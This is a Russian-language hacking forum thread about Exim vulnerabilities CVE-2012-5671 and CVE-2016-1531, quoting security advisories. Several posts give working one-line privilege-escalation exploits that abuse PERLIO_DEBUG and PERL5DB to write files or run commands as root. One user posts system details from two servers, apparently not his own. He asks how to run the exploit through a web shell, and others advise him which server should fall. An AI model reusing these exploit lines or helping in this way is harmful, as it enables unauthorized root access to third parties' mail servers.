Старый 27.10.2012, 20:45   #1
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию CVE-2012-5671 - Exim

Цитата:
A heap-buffer overflow was found in the DKIM DNS decode logic, used by exim. A remote attacker could use this flaw to execute arbitrary code on the mail server running Exim.
Кому скучно - копайте

Author: Phil Pennock
Date: 2012-10-26 12:03 +400
To: exim-announce
Subject: [exim-announce] Exim 4.80.1 Security Release

* exim 4.70 - 4.80

https://lists.exim.org/lurker/message/20121026.080330.74b9147b.en.html
https://bugzilla.redhat.com/show_bug.cgi?id=869953

Тест: exim -bV | grep DKIM

Последний раз редактировалось Pashkela; 27.10.2012 в 20:52..
Pashkela вне форума   Ответить с цитированием
Старый 29.10.2012, 02:22   #2
SoLDaT
 
Регистрация: 12.01.2011
Сообщений: 3
Репутация: 0
По умолчанию

в тот же день, и пофиксили _opennet.ru/opennews/art.shtml?num=35181 , хотя как знать...
SoLDaT вне форума   Ответить с цитированием
Старый 02.11.2012, 08:21   #3
CepbIu
 
Регистрация: 02.11.2012
Сообщений: 1
Репутация: 0
По умолчанию

не плохо бы было PoC увидеть, как раз есть
Код:
/usr/local/sbin/exim -bV | grep DKIM
Support for: crypteq iconv() IPv6 use_setclassresources PAM Perl Expand_dlfunc OpenSSL Content_Scanning DKIM Old_Demime
CepbIu вне форума   Ответить с цитированием
Старый 07.03.2016, 12:46   #4
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Цитата:
Security release for CVE-2016-1531: 4.84.2, 4.85.2, 4.86.2, 4.87 RC5

All installations having Exim set-uid root and using 'perl_startup' are
vulnerable to a local privilege escalation. Any user who can start an
instance of Exim (and this is normally *any* user) can gain root
privileges. If you do not use 'perl_startup' you *should* be safe.
https://lists.exim.org/lurker/messag...2d8433.en.html

Как можно создать world-writable файл где угодно:
Цитата:
CVE-2016-1531 exploit "PERLIO_DEBUG=/root/.ssh/authorized_keys /usr/exim/bin/exim -ps" - write to any file as root
https://twitter.com/hackerfantastic/...127809/photo/1

Еще:
Цитата:
@bl4sty: Since @hackerfantastic just dropped his exim exploit:
PERL5OPT=d PERL5DB='system("id"); exit;' /usr/sbin/exim -ps #CVE-2016-1531

Последний раз редактировалось SynQ; 09.03.2016 в 12:34..
SynQ вне форума   Ответить с цитированием
Старый 25.03.2016, 23:57   #5
LorDo
 
Регистрация: 09.12.2014
Сообщений: 16
Репутация: 0
По умолчанию

А backconnect обязателен ?
Есть 2 сервака
1)
Код:
uname -a
Linux 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

/usr/sbin/exim -bV | grep DKIM
Support for: crypteq iconv() IPv6 PAM Perl OpenSSL Content_Scanning DKIM Old_Demime DNSSEC PRDR OCSP Experimental_SPF Experimental_SRS

/usr/sbin/exim --version | head -n 1
Exim version 4.86_1 #1 built 04-Mar-2016 17:12:16
2)
Код:
uname -a
Linux 3.10.65--generic-shared-2.2.1-20141130 #1 SMP Thu Oct 29 13:10:19 UTC 2015 x86_64 Intel(R) Xeon(R) CPU E5-2620 0 @ 2.00GHz GenuineIntel GNU/Linux

exim -bV | grep DKIM
Support for: crypteq iconv() IPv6 PAM Perl TCPwrappers GnuTLS DKIM PRDR OCSP

exim --version | head -n 1
Exim version 4.84 #2 built 17-Sep-2015 19:06:43
Что-то вообще сделать можно ?
LorDo вне форума   Ответить с цитированием
Старый 29.03.2016, 15:53   #6
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

LorDo
Второй сервер как раз должен взяться тем, что в моем посте.
SynQ вне форума   Ответить с цитированием
Старый 03.04.2016, 20:55   #7
LorDo
 
Регистрация: 09.12.2014
Сообщений: 16
Репутация: 0
По умолчанию

Цитата:
Сообщение от SynQ Посмотреть сообщение
LorDo
Второй сервер как раз должен взяться тем, что в моем посте.
Ну а как конкретней это заюзать ?
Просто в веб шеле в исполняю
Код:
PERL5OPT=d PERL5DB='system("id"); exit;' /usr/sbin/exim -ps #CVE-2016-1531
т.е. по факту это будет выглядеть как-то так
Код:
exec("PERL5OPT=d PERL5DB='system(\"id\"); exit;' /usr/sbin/exim -ps");
В ответ просто получаю
Код:
Exim is a Mail Transfer Agent. It is normally called by Mail User Agents,
not directly from a shell command line. Options and/or arguments control
what it does when called. For a list of options, see the Exim documentation.
Чет не то делаю ?
LorDo вне форума   Ответить с цитированием
Старый 06.04.2016, 19:02   #8
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

ответ и должен быть таким,значит не прокатит на нем,увы( такая же проблема была.
Faaax вне форума   Ответить с цитированием
Старый 30.05.2016, 01:50   #9
Ravenous
 
Аватар для Ravenous
 
Регистрация: 14.07.2012
Сообщений: 64
Репутация: 1
По умолчанию

На FreeBSD работает CVE-2016-1531??
Ravenous вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot